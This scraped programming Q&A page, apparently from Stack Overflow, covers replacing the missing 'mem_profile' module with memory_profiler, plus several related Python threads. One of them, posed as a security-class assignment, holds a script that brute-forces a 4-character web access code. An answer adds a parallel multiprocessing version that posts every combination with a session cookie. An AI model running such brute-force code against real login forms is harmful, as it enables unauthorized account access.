No module named mem_profile - python

I'm using this program to measure the time and memory used by two functions and compare which is better for processing a large amount of data. My understanding is that to measure the memory usage we need the mem_profile module, but during the pip install mem_profile it gave me the error No module named mem_profile.
import mem_profile
import random
import time
names = ['Kiran','King','John','Corey']
majors = ['Math','Comps','Science']
print 'Memory (Before): {}Mb'.format(mem_profile.memory_usage_resource())
def people_list(num_people):
results = []
for i in num_people:
person = {
'id':i,
'name': random.choice(names),
'major':random.choice(majors)
}
results.append(person)
return results
def people_generator(num_people):
for i in xrange(num_people):
person = {
'id':i,
'name': random.choice(names),
'major':random.choice(majors)
}
yield person
t1 = time.clock()
people = people_list(10000000)
t2 = time.clock()
# t1 = time.clock()
# people = people_generator(10000000)
# t2 = time.clock()
print 'Memory (After): {}Mb'.format(mem_profile.memory_usage_resource())
print 'Took {} Seconds'.format(t2-t1)
What has caused this error? And are there any alternative packages I could use instead?

1)First import module
pip install memory_profiler
2)include it in your code like this
import memory_profiler as mem_profile
3)change code
mem_profile.memory_usage_psutil() to memory_usage()
4)convert you print statements like this
print('Memory (Before): ' + str(mem_profile.memory_usage()) + 'MB' )
print('Memory (After) : ' + str(mem_profile.memory_usage()) + 'MB')
print ('Took ' + str(t2-t1) + ' Seconds')
5)you will have something like this code:
import memory_profiler as mem_profile
import random
import time
names = ['John', 'Corey', 'Adam', 'Steve', 'Rick', 'Thomas']
majors = ['Math', 'Engineering', 'CompSci', 'Arts', 'Business']
# print('Memory (Before): {}Mb '.format(mem_profile.memory_usage_psutil()))
print('Memory (Before): ' + str(mem_profile.memory_usage()) + 'MB' )
def people_list(num_people):
result = []
for i in range(num_people):
person = {
'id': i,
'name': random.choice(names),
'major': random.choice(majors)
}
result.append(person)
return result
def people_generator(num_people):
for i in range(num_people):
person = {
'id': i,
'name': random.choice(names),
'major': random.choice(majors)
}
yield person
# t1 = time.clock()
# people = people_list(1000000)
# t2 = time.clock()
t1 = time.clock()
people = people_generator(1000000)
t2 = time.clock()
# print 'Memory (After) : {}Mb'.format(mem_profile.memory_usage_psutil())
print('Memory (After) : ' + str(mem_profile.memory_usage()) + 'MB')
# print 'Took {} Seconds'.format(t2-t1)
print ('Took ' + str(t2-t1) + ' Seconds')
Now it work fine i m using python 3.6 and its working without any error.

Was going through the same tutorial and encountered the same problem. But upon further research, I discovered the author of the tutorial used a package called memory_profiler, whose main file he changed to mem_profile, which he imported in the code tutorial.
Just go ahead and do pip install memory_profiler. Copy and rename the file to mem_profile.py in your working directory and you should be fine. If you are on Windows, make sure you install the dependent psutil package as well.
Hope this helps somebody.

Use this for calculating time:
import time
time_start = time.time()
#run your code
time_elapsed = (time.time() - time_start)
As referenced by the Python documentation:
time.time() → float
Return the time in seconds since the epoch as a floating point number.
The specific date of the epoch and the handling of leap seconds is
platform dependent. On Windows and most Unix systems, the epoch is
January 1, 1970, 00:00:00 (UTC) and leap seconds are not counted
towards the time in seconds since the epoch. This is commonly referred
to as Unix time. To find out what the epoch is on a given platform,
look at gmtime(0).
Note that even though the time is always returned as a floating point
number, not all systems provide time with a better precision than 1
second. While this function normally returns non-decreasing values, it
can return a lower value than a previous call if the system clock has
been set back between the two calls.
The number returned by time() may be converted into a more common time
format (i.e. year, month, day, hour, etc…) in UTC by passing it to
gmtime() function or in local time by passing it to the localtime()
function. In both cases a struct_time object is returned, from which
the components of the
calendar date may be accessed as attributes.
Reference: https://docs.python.org/3/library/time.html#time.time
Use this for calculating memory:
import resource
resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
Reference: http://docs.python.org/library/resource.html
Use this if you using python 3.x:
Reference: https://docs.python.org/3/library/timeit.html

Adding to Adebayo Ibro's answer above. Do the following :
In terminal, run $ pip install memory_profiler
In your script, replace import mem_profile with import memory_profiler as mem_profile
In your script, replace all mem_profile.memory_usage_resource() with mem_profile.memory_usage().
Hope this helps!

That module is hand written (not in python packages).
I got this from Corey Schafer's comment in his youtube video.
Just save this code as the module's name:
from pympler import summary, muppy
import psutil
import resource
import os
import sys
def memory_usage_psutil():
# return the memory usage in MB
process = psutil.Process(os.getpid())
mem = process.get_memory_info()[0] / float(2 ** 20)
return mem
def memory_usage_resource():
rusage_denom = 1024.
if sys.platform == 'darwin':
# ... it seems that in OSX the output is different units ...
rusage_denom = rusage_denom * rusage_denom
mem = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / rusage_denom
return mem

I just encountered the same problem. I solved it installing memory_profiler ($ pip install -U memory_profiler), and them modify the program as follows:
import memory_profiler
...
print('Memory (Before): {}Mb'.format(memory_profiler.memory_usage()))

A couple of python 3.8 updates since time.clock() was removed, and print() has evolved.
Thanks everyone for this discussion, and definitely thanks to Corey Schafer great video.
import memory_profiler as mem_profile
import random
import time
names = ['John', 'Corey', 'Adam', 'Steve', 'Rick', 'Thomas']
majors = ['Math', 'Engineering', 'CompSci', 'Arts', 'Business']
print(f'Memory (Before): {mem_profile.memory_usage()}Mb')
def people_list(num_people):
result = []
for i in range(num_people):
person = {
'id': i,
'name': random.choice(names),
'major': random.choice(majors)
}
result.append(person)
return result
def people_generator(num_people):
for i in range(num_people):
person = {
'id': i,
'name': random.choice(names),
'major': random.choice(majors)
}
yield person
# t1 = time.process_time()
# people = people_list(1000000)
# t2 = time.process_time()
t1 = time.process_time()
people = people_generator(1000000)
t2 = time.process_time()
print(f'Memory (After): {mem_profile.memory_usage()}Mb')
print(f'Took {t2-t1} Seconds')

I went through the same tutorial
the library name is memory_profiler
in order to install, you can use the following
pip install -U memory_profiler
to importing
import memory_profiler
note: the library does not have memory_usage_resource function
but you can use memory_usage with the same functionality.
instead of using clock() function use time() function
import memory_profiler
import random
import time
names=['John', 'Jane', 'Adam','Steve', 'Rick','George','Paul','Bill','Bob']
majors=['Math','Engineering','ComSic','Arts','Stuck Broker']
print ('Memory (Before): {} MB'.format(memory_profiler.memory_usage()))
#using list
def people_list(num_people):
result = []
for i in range(num_people):
person={
'id':i,
'name':random.choice(names),
'major':random.choice(majors)
}
result.append(person)
return result
#using generators
def people_generator(num_people):
for i in range(num_people):
person={
'id':i,
'name':random.choice(names),
'major':random.choice(majors)
}
yield person
# t1=time.time()
# people_list(1000000)
# t2=time.time()
t1=time.time()
people_generator(1000000)
t2=time.time()
print('Memory (After): {} MB'.format(memory_profiler.memory_usage()))
print ('Took {} seconds'.format(t2-t1))

Much simple with sys
import sys
...
print ('Memory (Before): {0}Mb'.format(sys.getsizeof([])))

during the pip install mem_profile it gave me error No module named mem_profile.
by default, pip will download packages from PyPI. No package exists on PyPI named "mem_profile", so of course you will get an error.
for timing blocks of code, the timeit module is what you want to use:
https://docs.python.org/library/timeit.html

Related

Check every X-milliseconds if process/application is running on Win

i want to check every 500 milliseconds if a process/application is running (Windows 10). The code should be very fast and resource efficient!
My Code is this but how to build the 500 milliseconds in. Is psutil the fastest and best way? Thank You.
import psutil
for p in psutil.process_iter(attrs=['pid', 'name']):
if "excel.exe" in (p.info['name']).lower():
print("Application is running", (p.info['name']).lower())
else:
print("Application is not Running")
How about doing it like this:
import psutil
import time
def running(pname):
pname = pname.lower()
for p in psutil.process_iter(attrs=['name']):
if pname in p.info['name'].lower():
print(f'{pname} is running')
return # early return
print(f'{pname} is not running')
while True:
running('excel.exe')
time.sleep(0.5)
First of all, psutil is a pretty good library. It has C Bindings so you won't be able to get much faster.
import psutil
import time
def print_app():
present = False
for p in psutil.process_iter(attrs=['pid', 'name']):
if "excel.exe" in (p.info['name']).lower():
present = True
print(f"Application is {'' if present else 'not'} present")
start_time = time.time()
print_app()
print("--- %s seconds ---" % (time.time() - start_time))
You can know how much time it takes. 0.06sec for me.
if you want to exec this every 0.5s you can simply put a time.sleep because 0.5 >> 0.06.
You can then write this kind of code:
import psutil
import time
def print_app():
present = False
for p in psutil.process_iter(attrs=['pid', 'name']):
if "excel.exe" in (p.info['name']).lower():
present = True
print(f"Application is {'' if present else 'not'} present")
while True:
print_app()
sleep(0.5)
PS: I changed your code to check if your app was running without printing it. This makes the code faster because print takes a bit of time.

Threading timer function not working within multiprocessing recursive script

I am a biologist and I am new to parallel processing. Some important background is that some of my scripts can take up to 15hrs to execute. While the main function (in_command) is running I am trying to run in parallel a function that will take snapshots of the hardware usage (CPU, RAM, etc.). The problem I am having is that my recursive script that is on a timer (get_stats) is executing correctly when it ran separately, but as soon as I run it in parallel using multiprocessing the timer doesn't seem to work. The function runs about every second even though I have it on a 300second timer. It does stop after the other script has finished, but I get way more snapshots than needed. I am also not in love with my current approach so if there is a better way to do it I am willing to learn. I just can't have it impact the other script too much hence the snapshot approach, I only need to know generally what is happening. Thanks!
import psutil
import platform
from datetime import datetime
import multiprocessing
import time
import os
from threading import Timer
import multiprocessing as mp
def get_size(bytes, suffix="B"):
"""
Scale bytes to its proper format
e.g:
1253656 => '1.20MB'
1253656678 => '1.17GB'
"""
factor = 1024
for unit in ["", "K", "M", "G", "T", "P"]:
if bytes < factor:
return f"{bytes:.2f}{unit}{suffix}"
bytes /= factor
def get_stats(switch, snapshot_dict, beg_time):
df =snapshot_dict
start_time = beg_time
df['time'].append(time.time() - start_time)
# Get core information
df['total_cores'].append(psutil.cpu_count(logical=True))
df['physical_cores'].append(psutil.cpu_count(logical=False))
cpufreq = psutil.cpu_freq()
# cpu frequency in Mhz
df['max_frequency'].append(cpufreq.max)
df['min_frequency'].append(cpufreq.min)
df['current_frequency'].append(cpufreq.current)
cpu_core = {}
for i, percentage in enumerate(psutil.cpu_percent(percpu=True, interval=1)):
cpu_core[str(i)] = percentage
df['cpu_core'].append(cpu_core)
# get ram information
svmem = psutil.virtual_memory()
df['total_memory'].append(get_size(svmem.total))
df['available_memory'].append(get_size(svmem.available))
df['used_memory'].append(get_size(svmem.used))
df['percent_memory'].append(svmem.percent)
# swap memory if it exists
swap = psutil.swap_memory()
df['swap_total'].append(get_size(swap.total))
df['swap_free'].append(get_size(swap.free))
df['swap_used'].append(get_size(swap.used))
df['swap_percentage'].append(swap.percent)
print(df)
#Call the code on a recursive function
t = Timer(300, get_stats(switch,df,beg_time))
t.start()
print('Switch: ', switch.value)
if switch.value == 1:
t.cancel()
def in_command(file,switch):
f = open(file,'r')
f_lines = f.readlines()
for line in f_lines:
print(line)
os.system(line)
f.close()
switch.value += 1
if __name__ == "__main__":
manager= mp.Manager()
df = {'time': [], 'total_cores': [], 'physical_cores': [], 'max_frequency': [],
'min_frequency': [], 'current_frequency': [], 'cpu_core': [], 'total_memory': [],
'available_memory': [], 'used_memory': [], 'percent_memory': [], 'swap_total': [],
'swap_free': [], 'swap_used': [], 'swap_percentage': []}
process_switch = manager.Value('i',0)
start_time = time.time()
p1 = mp.Process(target=get_stats, args = (process_switch, df, start_time))
p2 = mp.Process(target=in_command, args=('text_command.txt', process_switch))
p1.start()
p2.start()
p1.join()
p2.join()
print('finished')
Thanks Michael. So to everyone who might be reading this, I don't include the arguments in the call function but I put them in separately.
Incorrect:
t = Timer(300, get_stats(switch,df,beg_time))
Correct:
t = Timer(5, function=get_stats,args=[switch,snapshot_dict,beg_time])

monitor function name error using simpy

very new to python and trying to use a simpy script I found online to queue times. I am getting a name error when I use "Monitor" - which I thought was part of SimPy. Is there somewhere else I should be importing monitor from?
Thanks in advance for the help!
See below:
#!/usr/bin/env python
from __future__ import generators
import simpy
from multiprocessing import Queue, Process
from random import Random,expovariate,uniform
# MMC.py simulation of an M/M/c/FCFS/inft/infty queue
# 2004 Dec updated and simplified
# $Revision: 1.1.1.5 $ $Author: kgmuller $ $Date: 2006/02/02 13:35:45 $
"""Simulation of an M/M/c queue
Jobs arrive at random into a c-server queue with
exponential service-time distribution. Simulate to
determine the average number and the average time
in the system.
- c = Number of servers = 3
- rate = Arrival rate = 2.0
- stime = mean service time = 1.0
"""
__version__='\nModel: MMC queue'
class Generator(Process):
""" generates Jobs at random """
def execute(self,maxNumber,rate,stime):
##print "%7.4f %s starts"%(now(), self.name)
for i in range(maxNumber):
L = Job("Job "+`i`)
activate(L,L.execute(stime),delay=0)
yield hold,self,grv.expovariate(rate)
class Job(Process):
""" Jobs request a gatekeeper and hold it for an exponential time """
def execute(self,stime):
global NoInSystem
arrTime=now()
self.trace("Hello World")
NoInSystem +=1
m.accum(NoInSystem)
yield request,self,server
self.trace("At last ")
t = jrv.expovariate(1.0/stime)
msT.tally(t)
yield hold,self,t
yield release,self,server
NoInSystem -=1
m.accum(NoInSystem)
mT.tally(now()-arrTime)
self.trace("Geronimo ")
def trace(self,message):
if TRACING:
print "%7.4f %6s %10s (%2d)"%(now(),self.name,message,NoInSystem)
TRACING = 0
print __version__
c = 3
stime = 1.0
rate = 2.0
print "%2d servers, %6.4f arrival rate,%6.4f mean service time"%(c,rate,stime)
grv = Random(333555) # RV for Source
jrv = Random(777999) # RV for Job
NoInSystem = 0
m=Monitor()
mT=Monitor()
msT=Monitor()
server=Resource(c,name='Gatekeeper')
initialize()
g = Generator('gen')
activate(g,g.execute(maxNumber=10,rate=rate,stime=stime),delay=0)
simulate(until=3000.0)
print "Average number in the system is %6.4f"%(m.timeAverage(),)
print "Average time in the system is %6.4f"%(mT.mean(),)
print "Actual average service-time is %6.4f"%(msT.mean(),)
You are currently receiving a name error because Monitor hasn't currently been defined within your script. In order to use the Monitor from within simpy, you will need to either change import simpy to from simpy import Monitor or append simpy.Monitor for the locations that you are currently using the Monitor function.
Ex:
#!/usr/bin/env python
from __future__ import generators
from simpy import Monitor
Or (lines 71-73):
m=simpy.Monitor()
mT=simpy.Monitor()
msT=simpy.Monitor()

Slow brute force program in python

So here's the problem, our security teacher made a site that requires authentification and then asks for a code (4 characters) so that you can access to a file. He told us to write a brute force program in Python (any library we want) that can find the password. So to do that I wanted first to make a program that can try random combinations on that code field just to have an idea about the time of each request ( I'm using requests library) and the result was disapointing each request takes around 8 secs.
With some calculations: 4^36=13 436 928 possible combination that would take my program around 155.52 days.
I would really apreciate if any one can help me out to make that faster. ( he told us that it is possible to make around 1200 combinations per sec)
Here's my code:
import requests
import time
import random
def gen():
alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
pw_length = 4
mypw = ""
for i in range(pw_length):
next_index = random.randrange(len(alphabet))
mypw = mypw + alphabet[next_index]
return mypw
t0 = time.clock()
t1 = time.time()
cookie = {'ig': 'b0b5294376ef12a219147211fc33d7bb'}
for i in range(0,5):
t2 = time.clock()
t3 = time.time()
values = {'RECALL':gen()}
r = requests.post('http://www.example.com/verif.php', stream=True, cookies=cookie, data=values)
print("##################################")
print("cpu time for req ",i,":", time.clock()-t2)
print("wall time for req ",i,":", time.time()-t3)
print("##################################")
print("##################################")
print("Total cpu time:", time.clock()-t0)
print("Total wall time:", time.time()-t1)
Thank you
A thing you could try is to use a Pool of workers to do multiple requests in parallel passing a password to each worker. Something like:
import itertools
from multiprocessing import Pool
def pass_generator():
for pass_tuple in itertools.product(alphabet, repeat=4):
yield ''.join(pass_tuple)
def check_password(password):
values = {'RECALL': password}
r = requests.post('http://www.example.com/verif.php', stream=True, cookies=cookie, data=values)
# Check response here.
pool = Pool(processes=NUMBER_OF_PROCESSES)
pool.map(check_password, pass_generator())

How can I clear a line in console after using \r and printing some text?

For my current project, there are some pieces of code that are slow and which I can't make faster. To get some feedback how much was done / has to be done, I've created a progress snippet which you can see below.
When you look at the last line
sys.stdout.write("\r100%" + " "*80 + "\n")
I use " "*80 to override eventually remaining characters. Is there a better way to clear the line?
(If you find the error in the calculation of the remaining time, I'd also be happy. But that's the question.)
Progress snippet
#!/usr/bin/env python
import time
import sys
import datetime
def some_slow_function():
start_time = time.time()
totalwork = 100
for i in range(totalwork):
# The slow part
time.sleep(0.05)
if i > 0:
# Show how much work was done / how much work is remaining
percentage_done = float(i)/totalwork
current_running_time = time.time() - start_time
remaining_seconds = current_running_time / percentage_done
tmp = datetime.timedelta(seconds=remaining_seconds)
sys.stdout.write("\r%0.2f%% (%s remaining) " %
(percentage_done*100, str(tmp)))
sys.stdout.flush()
sys.stdout.write("\r100%" + " "*80 + "\n")
sys.stdout.flush()
if __name__ == '__main__':
some_slow_function()
Consoles
I use ZSH most of the time, sometimes bash (and I am always on a Linux system)
Try using the ANSI/vt100 "erase to end of line" escape sequence:
sys.stdout.write("\r100%\033[K\n")
Demonstration:
for i in range(4):
sys.stdout.write("\r" + ("."*i*10))
sys.stdout.flush()
if i == 3:
sys.stdout.write("\rDone\033[K\n")
time.sleep(1.5)
Reference: https://en.wikipedia.org/wiki/ANSI_escape_code#CSI_sequences
This is what I use
from msvcrt import putch, getch
def putvalue(value):
for c in str(value):
putch(c)
def overwrite(value):
""" Used to overwrite the current line in the command prompt,
useful when displaying percent or progress """
putvalue('\r'+str(value))
from time import sleep
for x in xrange(101):
overwrite("Testing Overwrite.........%s%% complete" % x)
sleep(.05)

Categories

Resources